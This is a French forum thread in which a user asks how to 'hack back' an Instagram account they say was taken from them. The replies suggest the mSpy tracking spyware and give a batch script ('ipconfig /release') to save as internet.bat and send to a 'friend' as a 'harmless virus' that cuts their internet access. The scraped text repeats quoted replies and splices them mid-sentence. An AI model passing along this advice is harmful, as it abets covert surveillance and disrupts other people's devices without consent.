- Fofocoins
- 544
Je ne pirate pas les comptes. Cependant je vais te donner un indice que tu aurais pu trouve ver facilement sur Google : mspy Instagram tracker ou un truc du genre je te laisse te débrouiller et faire tes petites recherches perso je veux être accusé et mêle a rien moi hein ^^Salut, j'ai besoin d'une personne sachant pirater un compte instagram car on m'a piraté mon compte et je souhaite le pirater afin de pouvoir le récupérer
c'est mon propre compte que je souhaite pirater rien de méchant.Je ne pirate pas les comptes. Cependant je vais te donner un indice que tu aurais pu trouve ver facilement sur Google : mspy Instagram tracker ou un truc du genre je te laisse te débrouiller et faire tes petites recherches perso je veux être accusé et mêle a rien moi hein ^^
Ceci est un virus inoffensif et il ne détruira pas son smartphone. Ce virus arrête l’accès à Internet de n’importe qui. Tape ça dans le bloc note :c'est mon propre
c'est mon propre compte que je souhaite pirater rien de méchant.
J'ai regardé mspy mais il faut que j'aie accès physiquement au portable de la personne.. et je ne peux pas
je tape dans le bloc note normal d'apple ? et comment je fais pour l'enregistrer au format bat ? j'imagine que je dois faire avec mon ordi et encore une question du coup comment cela va me servir à récupérer mon compte ?Ceci est un virus inoffensif et il ne détruira pas son smartphone. Ce virus arrête l’accès à Internet de n’importe qui. Tape ça dans le bloc note :
@Écho off
Ipconfig / release
Maintenant, enregistre le fichier au format .bat comme internet.bat et envoyez-le à ton ami. L’adresse IP sera perdue, et par conséquent, il lui sera impossible de le réparer.
Si tu veux réparer tape : IPconfig / renew
reviens me voir si tu 'y arrives pas ! ^^
mais bien sûr, je n'engage pas la responsabilité dans ce que tu veux et va faire, qu'on soit d'accord -_-
Bah je sais pas comment faire alors je le suis dit qu'au moins en le priant d'internet ils pourraient plus se connecter à ton compte et ça te laisse le temps d'avoir son téléphone physiquementje tape dans le bloc note normal d'apple ? et comment je fais pour l'enregistrer au format bat ? j'imagine que je dois faire avec mon ordi et encore une question du coup comment cela va me servir à récupérer mon compte ?
le problème est que je n'ai aucun moyen d'avoir son téléphone physiquement .. mais bon je vais voir comment je peux faire merci beaucoup et si d'un coup tu connais quelqu'un qui sait le faire écris moi un petit message mercii !!!Bah je sais pas comment faire alors je le suis dit qu'au moins en le priant d'internet ils pourraient plus se connecter à ton compte et ça te laisse le temps d'avoir son téléphone physiquement
Pour le reste je te laisse te débrouiller ça me plaît pas trop cette histoire ^^
🚫 Alerte AdBlock !
Vous avez activé le mode Ninja, et il cache toutes les pubs ! 😆 Un petit coup de pouce pour notre site serait super apprécié si vous pouvez le désactiver. 🙏